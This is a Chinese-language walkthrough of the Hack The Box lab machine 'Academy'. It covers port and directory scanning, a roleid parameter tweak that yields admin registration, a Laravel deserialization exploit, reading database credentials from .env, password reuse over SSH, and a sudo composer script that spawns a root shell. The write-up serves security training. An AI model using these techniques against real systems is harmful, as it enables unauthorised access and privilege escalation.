基本信息

端口扫描

常规的22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ nmap -sC -sV -Pn 10.10.10.215
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-09 14:15 CST
Nmap scan report for 10.10.10.215
Host is up (0.072s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.03 seconds

80

需要加下hosts:

1
10.10.10.215 academy.htb

普通的注册登录:

就是HTB新出了Academy,所以这周的靶机也是这个:

admin.php

简单扫描发现一个admin.php,需要登录,我们之前注册的账号无法登录:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
➜  Academy gobuster dir -u http://academy.htb/ -w /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt -k -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://academy.htb/
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/Common-PHP-Filenames.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/29 21:22:37 Starting gobuster
===============================================================
/register.php (Status: 200)
/login.php (Status: 200)
/home.php (Status: 302)
/index.php (Status: 200)
/config.php (Status: 200)
/admin.php (Status: 200)
===============================================================
2020/10/29 21:22:49 Finished
===============================================================

roleid

注意注册请求有个roleid,默认是0,如果改成1,注册的就是管理员用户:

得到一个新域名,同样加hosts后访问:

1
10.10.10.215 academy.htb dev-staging-01.academy.htb

dev-staging-01.academy.htb

Laravel给出大量调试信息:

其中有token,搜索能够得到一个可利用漏洞:

Laravel 反序列化

exp直接打到www-root的shell,注意参数,rhosts是主域名,vhost是子域名:

1
python3 -c 'import pty; pty.spawn("/bin/bash")'

Laravel .env config

因为是Laravel。直接在.env目录得到数据库密码:

1
2
3
4
5
6
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

user flag

直接查看下有哪些用户,然后cry0l1t3用户可以用这个密码ssh登录,得到user.txt:

audit log

在audit log中得到mrb3n账号的密码:

提权信息

1
mrb3n : mrb3n_Ac@d3my!

mrb3n账号能以root权限执行composer:

利用方式:

root flag

直接提到root读取root.txt:

1
2
3
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

参考资料